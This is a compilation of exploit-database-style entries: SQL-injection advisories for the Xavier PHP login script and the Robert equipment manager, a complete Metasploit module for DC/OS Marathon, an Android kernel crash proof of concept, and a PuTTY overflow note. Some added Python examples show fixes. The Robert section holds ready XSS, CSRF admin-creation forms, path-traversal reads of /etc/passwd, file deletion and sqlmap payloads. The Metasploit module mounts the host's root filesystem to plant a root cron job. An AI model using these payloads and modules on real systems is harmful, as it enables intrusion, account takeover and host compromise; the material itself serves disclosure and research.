Document Title:
===============
Xavier v2.4 PHP MP - SQL Injection Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2076


Release Date:
=============
2017-06-06


Vulnerability Laboratory ID (VL-ID):
====================================
2076


Common Vulnerability Scoring System:
====================================
5.3


Vulnerability Class:
====================
SQL Injection


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
The script can easily be dropped in to an existing website allowing you to protect pages by adding one line of PHP code at the top of a page. 
You can also protect sections of pages. Secure your web pages or sections of content dependent on whether your users are logged in or out, 
or whether they are a member of a User Group. Or secure your pages dependent on whether you are logged on as an administrator.

(Copy of the Homepage:  https://codecanyon.net/item/xavier-php-login-script-user-management/9146226 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Xavier PHP Login Script & User Management Admin Panel v2.4 web-application.


Vulnerability Disclosure Timeline:
==================================
2017-06-06: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Siggles
Product: Xavier - PHP Login Script & User Management Admin Panel 2.4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple sql-injection vulnerabilities have been discovered in the Xavier PHP Login Script & User Management Admin Panel web-application.
The issue allows remote attackers to inject their own malicious sql commands to compromise the web-application and database management system.

The sql-injection vulnerabilities are located in the `usertoedit` and `log_id` parameters of the `adminuseredit.php` and `editgroup.php` files 
of the admin panel. Remote attackers with privileged user accounts are able to compromise the web-application and database management system 
by injection of sql commands via GET method request. The attack vector is client-side and the request method to inject the sql commands is GET. 
The vulnerability is a classic order by sql-injection: the parameter value is concatenated into the query string handed to PDO->query(), and 
the uncaught PDOException shown below additionally discloses the query prefix and the absolute installation path.

The security risk of the sql-injection web vulnerability is estimated as medium with a common vulnerability scoring system count of 5.3. 
Exploitation of the remote sql-injection web vulnerability requires an authenticated, privileged web-application user account and no user interaction. 
Successful exploitation of the sql-injection web vulnerability results in web-application or database management system compromise.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] adminuseredit.php
[+] editgroup.php

Vulnerable Parameter(s):
[+] usertoedit
[+] log_id


Proof of Concept (PoC):
=======================
The remote sql-injection vulnerability can be exploited by authenticated user accounts without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


PoC: Example
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=[SQL-INJECTION VULNERABILITY!]
https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=[SQL-INJECTION VULNERABILITY!]


PoC: Exploitation
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=1%20order%20by%203--
https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=1%20order%20by%203--


--- SQL Error & Exception Logs ---
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42S22]: 
Column not found: 1054 Unknown column '100' in 'order clause'' 
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace: 
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...') 
#1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), '1 order by 100-...') 
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
-
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: 
Syntax error or access violation: 1064 You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' 
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace: 
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...') 
#1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), ''') 
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
-
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: 
Syntax error or access violation: 1064 You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1' 
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:59 Stack trace: 
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(59): PDO->query('SELECT username...') 
#1 /home/angry/public_html/xavier-demo/admin/adminuseredit.php(26): Functions->usernameTaken('-1' -1'') 
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 59


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=%27[SQL-INJECTION VULNERABILITY!]-- 
Mime Type[text/html]
   Request Header:
      Host[xavier-php.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache]
      Keep-Alive[timeout=2, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html]
-
20:49:05.559[216ms][total 277ms] Status: 200[OK]
GET https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=%27[SQL-INJECTION VULNERABILITY!]-- 
Mime Type[text/html]
   Request Header:
      Host[xavier-php.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache]
      Keep-Alive[timeout=2, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html]


Reference(s):
https://xavier-php.localhost:8080/
https://xavier-php.localhost:8080/xavier/
https://xavier-php.localhost:8080/xavier/admin/
https://xavier-php.localhost:8080/xavier/admin/editgroup.php
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php


Solution - Fix & Patch:
=======================
The vulnerability can be patched by parsing and escaping the vulnerable parameters in the affected php files. Because the PoC injects into 
an ORDER BY position rather than into a quoted string, escaping quotes alone is not sufficient: validate the value against its expected type 
(an integer id) before it reaches the query. Restrict the parameter input and use prepared statements (PDO::prepare with bound parameters 
instead of PDO::query on a concatenated string) to secure the functions of the admin panel.
Disable the display of php errors in the panel so that query text and file system paths are not disclosed to attackers.
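The following is an added example and not code from the Xavier product or from this advisory. It models the ORDER BY probe from the PoC above against an in-memory SQLite table, shows what the probe tells an attacker, and puts the concatenating handler next to a parameterised one. The table layout (id, name, level), its rows and the function names are constructed; the real panel runs MySQL through PDO.

```python
# Added example (not code from Xavier or the advisory): ORDER BY injection
# against a constructed SQLite table, with the vulnerable and fixed handlers.
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed stand-in for the panel's user-group table: three columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE groups (id INTEGER PRIMARY KEY, name TEXT, level INTEGER)"
    )
    conn.executemany(
        "INSERT INTO groups VALUES (?, ?, ?)",
        [(1, "administrators", 9), (2, "editors", 5), (3, "members", 1)],
    )
    return conn


def return_group_info_vulnerable(conn: sqlite3.Connection, log_id: str) -> list:
    """Vulnerable pattern: the GET parameter is pasted into the SQL text, like
    the PDO->query('SELECT * FROM `...') call in the stack trace above."""
    sql = "SELECT * FROM groups WHERE id = " + log_id
    return conn.execute(sql).fetchall()


def return_group_info_fixed(conn: sqlite3.Connection, log_id: str) -> list:
    """Fixed pattern: validate the type first, then bind it as a parameter.
    An integer position in ORDER BY cannot be protected by quote-escaping."""
    try:
        gid = int(log_id)
    except ValueError:
        raise ValueError("log_id must be an integer") from None
    return conn.execute("SELECT * FROM groups WHERE id = ?", (gid,)).fetchall()


def order_by_column_count(conn: sqlite3.Connection, max_cols: int = 16) -> int:
    """What the '1 order by N--' probe tells an attacker: the largest N that
    does not raise is the number of columns in the SELECT. MySQL reports
    "Unknown column 'N' in 'order clause'" past it (see the error log above);
    SQLite raises an OperationalError instead."""
    count = 0
    for n in range(1, max_cols + 1):
        try:
            return_group_info_vulnerable(conn, f"1 ORDER BY {n}--")
        except sqlite3.OperationalError:
            break
        count = n
    return count


def fixed_rejects(conn: sqlite3.Connection, payload: str) -> bool:
    """True when the parameterised handler refuses the payload outright."""
    try:
        return_group_info_fixed(conn, payload)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = setup_db()
    print("columns found by ORDER BY probe:", order_by_column_count(db))
    print("tautology returns every row:", return_group_info_vulnerable(db, "1 OR 1=1--"))
    print("fixed handler rejects the PoC payload:", fixed_rejects(db, "1 ORDER BY 3--"))
```

The column count recovered by the probe is what an attacker needs next for a UNION SELECT; the fixed handler never lets the string reach the parser, so the probe gets a validation error instead of a database error.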


Security Risk:
==============
The security risk of the sql-injection vulnerability in the web panel of the xavier application is estimated as medium (CVSS 5.3).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
            
# Exploit Title: Robert 0.5 - Multiple Vulnerabilities XSS, CSRF, Directory traversal & SQLi
# Date: 07/06/2017
# Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT
# Vendor website: http://robert.polosson.com/
# Download link : https://github.com/RobertManager/robert/archive/master.zip
# Live demo : http://robertdemo.polosson.com/
# Version: 0.5
# Tested on: Windows 7 x64 SP1 / Kali Linux


Robert is an open-source web application for managing a park of equipment for rental or loan.
It is written in HTML, PHP, MySQL, CSS and JavaScript.

Description: Multiple security issues have been found: XSS, CSRF, Directory Traversal, SQLi


1- XSS reflected

http://192.168.3.215/robert/index.php?go=infos%22%3E%3Cscript%3Ealert(1)%3C/script%3E
param vuln : go
script vuln : index.php

2- XSS reflected

POST /robert/modals/personnel_list_techniciens.php
data :
searchingfor=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&searchingwhat=surnom
param vuln : searchingfor
script vuln : personnel_list_techniciens.php

3- XSS Stored

POST /robert/fct/matos_actions.php
data:
 action=addMatos&label=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&ref="><script>alert(1)</script>&categorie=son&sousCateg=0&Qtotale=1&dateAchat=&tarifLoc=1&valRemp=1&externe=0&ownerExt=&remarque=%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
param vuln : label, ref and remarque
script vuln : matos_actions.php

4- XSS Stored

POST /robert/fct/packs_actions.php
data
:action=addPack&label=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&ref="><script>alert(4)</script>&categorie=son&detail=undefined&externe=0&remarque=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&detail={"2":1}
param vuln : label, ref and remarque
script vuln : packs_actions.php

5- XSS stored

POST /robert/fct/beneficiaires_actions.php
action=modif&id=2&surnom="><script>alert(7)</script>&GUSO=&CS=&prenom="><script>alert(8)</script>&nom="><script>alert(9)</script>&email=&tel=&birthDay=0000-00-00&birthPlace=&habilitations=undefined&categorie=regisseur&SECU=&SIRET=N/A&intermittent=0&adresse=&cp=&ville=&assedic=
param vuln : surnom, prenom, nom
script vuln : beneficiaires_actions.php

6- XSS stored

POST /robert/fct/tekos_actions.php
action=addStruct&id=1&label=test%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&NomRS=&type="><script>alert(3)</script>&adresse=test"><script>alert(4)</script>&codePostal=12312&ville="><script>alert(5)</script>&email="><script>alert(6)</script>&tel=&SIRET="><script>alert(8)</script>&remarque=%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E
param vuln : label, type, adresse, ville, email, SIRET and remarque
script vuln : tekos_actions.php

7- CSRF Create new admin

<form action="http://192.168.3.215/robert/fct/user_actions.php"
method="POST">
<input type="hidden" name="action" value="create"/>
<input type="hidden" name="cMail" value="hacked@hacked.com"/>
<input type="hidden" name="cName" value="hacked"/>
<input type="hidden" name="cPren" value="hacked"/>
<input type="hidden" name="cPass" value="hacked"/>
<input type="hidden" name="cLevel" value="7"/>
<input type="hidden" name="cTekos" value="0"/>
<input type="submit" value="CSRFED This Shit"/>
</form>

8- CSRF Change admin password and infos

<form action="http://192.168.3.215/robert/fct/user_actions.php"
method="POST">
<input type="hidden" name="action" value="modifOwnUser"/>
<input type="hidden" name="id" value="1"/>
<input type="hidden" name="email" value="hacked"/>
<input type="hidden" name="nom" value="hacked"/>
<input type="hidden" name="prenom" value="hacked"/>
<input type="hidden" name="password" value="hacked"/>
<input type="submit" value="CSRFED This Shit"/>
</form>

9- Directory traversal on Download function (Read Arbitrary File)

http://192.168.3.215/robert/fct/downloader.php?dir=sql&file=../../../../../../etc/passwd
param vuln : file
script vuln : downloader.php

10- Directory traversal on Upload function (Upload file in root path)

POST /robert/fct/uploader.php?dataType=tekos&folder=../../config&qqfile=filename.jpg HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
X-File-Name: filename.jpg
Content-Type: application/octet-stream
Referer: http://192.168.3.215/robert/index.php?go=gens
Content-Length: 99550
Cookie: YOURCOOKIE
Connection: close

...snip...
file data
...snip...

param vuln : folder
script vuln : uploader.php


11- Directory traversal on Delete function (Delete Arbitrary File)

POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 42
Cookie: YOURCOOKIE
Connection: close

action=supprFichier&idPlan=4&file=../../../../tested.txt

param vuln : file
script vuln : plans_actions.php

12- SQL Injection


POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 20
Cookie: YOURCOOKIE
Connection: close

action=loadPlan&ID=2'

POST parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 397 HTTP(s) requests:
---
Parameter: ID (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: action=loadPlan&ID=2' OR NOT 8111=8111#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: action=loadPlan&ID=2' AND (SELECT 3865 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(3865=3865,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XhTe

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: action=loadPlan&ID=2';SELECT SLEEP(5)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: action=loadPlan&ID=2' OR SLEEP(5)-- zwwN
---

param vuln : ID
script vuln : plans_actions.php
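Added example, not part of the Robert advisory or of the Robert project: the path check that the downloader.php, uploader.php and plans_actions.php handlers above are missing. It resolves the caller-supplied `dir`/`folder`/`file` components under a storage root and refuses anything that ends up outside it. BASE_DIR is an assumed location; the payloads are the three traversal requests from items 9, 10 and 11.

```python
# Added example (not from the Robert project): confine user-supplied path
# components to a base directory. BASE_DIR is an assumed storage root.
import os

BASE_DIR = "/srv/robert/upload"  # assumption: where the application keeps uploads


def resolve_inside(base_dir: str, *parts: str) -> str:
    """Join caller-supplied components under base_dir and return the resolved
    absolute path, or raise ValueError if the result is not strictly inside it."""
    base = os.path.realpath(base_dir)
    for part in parts:
        if not part or "\x00" in part:
            raise ValueError("empty or NUL-containing path component")
        if os.path.isabs(part):
            raise ValueError("absolute path component: %r" % part)
    # realpath collapses '..' segments and follows symlinks, so a candidate that
    # still sits under base after resolution is genuinely inside the tree.
    candidate = os.path.realpath(os.path.join(base, *parts))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes %s: %r" % (base_dir, parts))
    return candidate


def is_safe(base_dir: str, *parts: str) -> bool:
    """Boolean wrapper for resolve_inside()."""
    try:
        resolve_inside(base_dir, *parts)
    except ValueError:
        return False
    return True


# The traversal requests from the advisory, split into the components each
# script receives (the per-plan subdirectory used for item 11 is assumed).
ADVISORY_PAYLOADS = {
    "downloader.php": ("sql", "../../../../../../etc/passwd"),
    "uploader.php": ("../../config", "filename.jpg"),
    "plans_actions.php": ("plans", "../../../../tested.txt"),
}


def check_advisory_payloads(base_dir: str = BASE_DIR) -> dict:
    """Map each advisory request to whether the guard would accept it."""
    return {
        script: is_safe(base_dir, *parts)
        for script, parts in ADVISORY_PAYLOADS.items()
    }


if __name__ == "__main__":
    for script, accepted in check_advisory_payloads().items():
        print("%-20s accepted=%s" % (script, accepted))
    print(resolve_inside(BASE_DIR, "sql", "dump.sql"))
```

Checking `commonpath` on the resolved path, rather than searching the raw string for `..`, also catches encoded variants and symlinks that point out of the tree; for the upload and delete cases the same function should run before any write or unlink.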

------------------------------------------------------------------------------------------------------------------------------

#### Special Thanks to SC, PC and Mana l'artiste from HTTPCS - Ziwit SecTeam ####

------------------------------------------------------------------------------------------------------------------------------
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DC/OS Marathon UI Docker Exploit',
      'Description'    => %q{
        Utilizing the DCOS Cluster's Marathon UI, an attacker can create
        a docker container with the '/' path mounted with read/write
        permissions on the host server that is running the docker container.
        As the docker container executes commands as uid 0, they are honored
        by the host operating system, allowing the attacker to edit/create
        files owned by root. This exploit abuses this to create a cron job
        in the '/etc/cron.d/' path of the host server.

        *Notes: The docker image must be a valid docker image from
        hub.docker.com. Furthermore, the docker container will only
        deploy if there are resources available in the DC/OS cluster.
      },
      'Author'         => 'Erik Daguerre',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
      ],
      'Targets'            => [
        [ 'Python', {
            'Platform'   => 'python',
            'Arch'       => ARCH_PYTHON,
            'Payload'    => {
              'Compat'   => {
                'ConnectionType' => 'reverse noconn none tunnel'
              }
            }
          }
        ]
      ],
      'DefaultOptions' => { 'WfsDelay' => 75 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 03, 2017'))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
        OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
      ])
  end

  def get_apps
    res = send_request_raw({
      'method'  => 'GET',
      'uri'     => target_uri.path
    })
    return unless res and res.code == 200

    # verify it is marathon ui, and is returning content-type json
    return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
    apps = JSON.parse(res.body)

    apps
  end

  def del_container(container_id)
    res = send_request_raw({
      'method'  => 'DELETE',
      'uri'     => normalize_uri(target_uri.path, container_id)
    })
    return unless res and res.code == 200

    res.code
  end

  def make_container_id
    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?

    rand_text_alpha_lower(8)
  end

  def make_cmd(mnt_path, cron_path, payload_path)
    vprint_status('Creating the docker container command')
    payload_data = nil
    echo_cron_path = mnt_path + cron_path
    echo_payload_path = mnt_path + payload_path

    cron_command = "python #{payload_path}"
    payload_data = payload.raw

    command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
    command << "echo \"\" >> #{echo_cron_path}\n"
    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
    command << "sleep 120"

    command
  end

  def make_container(mnt_path, cron_path, payload_path, container_id)
    vprint_status('Setting container json request variables')
    container_data = {
      'cmd'                 => make_cmd(mnt_path, cron_path, payload_path),
      'cpus'                => 1,
      'mem'                 => 128,
      'disk'                => 0,
      'instances'           => 1,
      'id'                  => container_id,
      'container'           => {
        'docker'            => {
          'image'           => datastore['DOCKERIMAGE'],
          'network'         => 'HOST',
        },
        'type'              => 'DOCKER',
        'volumes'           => [
          {
            'hostPath'      => '/',
            'containerPath' => mnt_path,
            'mode'          => 'RW'
          }
        ],
      },
      'env'                 => {},
      'labels'              => {}
    }

    container_data
  end

  def check
    return Exploit::CheckCode::Safe if get_apps.nil?

    Exploit::CheckCode::Appears
  end

  def exploit
    if get_apps.nil?
      fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
    end
    # create required information to create json container information.
    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
    payload_path = '/tmp/' + rand_text_alpha(8)
    mnt_path = '/mnt/' + rand_text_alpha(8)
    container_id = make_container_id()

    res = send_request_raw({
      'method'  => 'POST',
      'uri'     => target_uri.path,
      'data'    => make_container(mnt_path, cron_path, payload_path, container_id).to_json
    })
    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201

    print_status('The docker container is created, waiting for it to deploy')
    register_files_for_cleanup(cron_path, payload_path)
    sleep_time = 5
    wait_time = datastore['WAIT_TIMEOUT']
    deleted_container = false
    print_status("Waiting up to #{wait_time} seconds for docker container to start")

    while wait_time > 0
      sleep(sleep_time)
      wait_time -= sleep_time
      apps_status = get_apps
      fail_with(Failure::Unknown, 'No apps returned') unless apps_status

      apps_status['apps'].each do |app|
        next if app['id'] != "/#{container_id}"

        if app['tasksRunning'] == 1
          print_status('The docker container is running, removing it')
          del_container(container_id)
          deleted_container = true
          wait_time = 0
        else
          vprint_status('The docker container is not yet running')
        end
        break
      end
    end

    # If the docker container does not deploy remove it and fail out.
    unless deleted_container
      del_container(container_id)
      fail_with(Failure::Unknown, "The docker container failed to start")
    end
    print_status('Waiting for the cron job to run, can take up to 60 seconds')
  end
end
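Added example, not part of the Metasploit module above: the defensive counterpart, an audit over the JSON that Marathon's `/v2/apps` endpoint returns, flagging app definitions with the shape `make_container` builds (a sensitive host path mounted RW into a container, a command that drops a cron entry). The two app documents are constructed; in practice the input comes from `GET http://<marathon>:8080/v2/apps`, and the list of sensitive host paths is an assumption to tune per cluster.

```python
# Added example (not from the Metasploit module): audit Marathon app
# definitions for host-root RW mounts. Sample apps are constructed.
import json
import posixpath

# Host paths that hand a root container control of the host when mounted RW.
# Assumed starting list; extend for the cluster being audited.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock", "/proc", "/sys")

SAMPLE_APPS_JSON = json.dumps({
    "apps": [
        {   # constructed: the shape produced by make_container() above
            "id": "/abcdefgh",
            "cmd": "echo \"...\" >> /mnt/xyz/tmp/p\n"
                   "echo \"* * * * * root python /tmp/p\" >> /mnt/xyz/etc/cron.d/job\n"
                   "sleep 120",
            "container": {
                "type": "DOCKER",
                "docker": {"image": "python:3-slim", "network": "HOST"},
                "volumes": [{"hostPath": "/", "containerPath": "/mnt/xyz", "mode": "RW"}],
            },
        },
        {   # constructed: a benign app with a read-only log volume
            "id": "/web",
            "cmd": "nginx -g 'daemon off;'",
            "container": {
                "type": "DOCKER",
                "docker": {"image": "nginx:1.13", "network": "BRIDGE"},
                "volumes": [{"hostPath": "/data/logs", "containerPath": "/var/log/nginx", "mode": "RO"}],
            },
        },
    ]
})


def under_sensitive_path(host_path: str) -> bool:
    """True if host_path is one of the sensitive paths or lies beneath one."""
    p = posixpath.normpath(host_path)
    return any(p == s or (s != "/" and p.startswith(s + "/")) for s in SENSITIVE_HOST_PATHS)


def app_findings(app: dict) -> list:
    """Return human-readable findings for one Marathon app definition."""
    findings = []
    container = app.get("container") or {}
    for vol in container.get("volumes") or []:
        host_path = vol.get("hostPath")
        mode = (vol.get("mode") or "RW").upper()
        if host_path and mode == "RW" and under_sensitive_path(host_path):
            findings.append("RW host mount of %s at %s" % (host_path, vol.get("containerPath")))
    cmd = app.get("cmd") or ""
    if "cron.d" in cmd or "crontab" in cmd:
        findings.append("cmd writes a cron entry")
    if (container.get("docker") or {}).get("network") == "HOST":
        findings.append("host networking (supporting indicator)")
    return findings


def audit_marathon_apps(apps_json: str) -> dict:
    """Map app id -> findings for every app that has at least one finding."""
    doc = json.loads(apps_json)
    results = {app["id"]: app_findings(app) for app in doc.get("apps", [])}
    return {app_id: f for app_id, f in results.items() if f}


if __name__ == "__main__":
    for app_id, findings in audit_marathon_apps(SAMPLE_APPS_JSON).items():
        print(app_id)
        for f in findings:
            print("  -", f)
```

Run against a live cluster, the same check belongs in an admission path (Marathon or Mesos-level policy) rather than only in after-the-fact review, because the module's container is deleted by the exploit as soon as it has run and will not remain in `/v2/apps` for long.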
            
// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

static int sockfd = 0;
static struct sockaddr_in addr = {0};

/* Worker thread: keeps calling connect() with sin_family = 0 (AF_UNSPEC) on the
 * shared address while main() connects with a different family, so the two
 * threads race on the socket's connected/unconnected state. */
static void *fuzz(void *param)
{
    (void)param;
    while (1) {
        addr.sin_family = 0; // rand()%42;
        printf("sin_family1 = %04x\n", (unsigned)addr.sin_family);
        connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
    }
    return NULL;
}

int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;
    /* Unprivileged ICMP "ping" socket; fails if the kernel does not allow it
     * for this process (net.ipv4.ping_group_range). */
    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    if (sockfd < 0) {
        perror("socket");
        return 1;
    }
    pthread_t thrd;
    if (pthread_create(&thrd, NULL, fuzz, NULL) != 0) {
        perror("pthread_create");
        return 1;
    }
    while (1) {
        addr.sin_family = 0x1a; // rand()%42;
        addr.sin_port = 0;
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
        addr.sin_family = 0;
    }
    return 0;
}
            
Source: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-agent-fwd-overflow.html

summary: Vulnerability: integer overflow permits memory overwrite by forwarded ssh-agent connections
class: vulnerability: This is a security vulnerability.
difficulty: fun: Just needs tuits, and not many of them.
priority: high: This should be fixed in the next release.
present-in: 0.67
fixed-in: 4ff22863d895cb7ebfced4cf923a012a614adaa8 (0.68)

Many versions of PuTTY prior to 0.68 have a heap-corrupting integer overflow bug in the ssh_agent_channel_data function which processes messages sent by remote SSH clients to a forwarded agent connection.

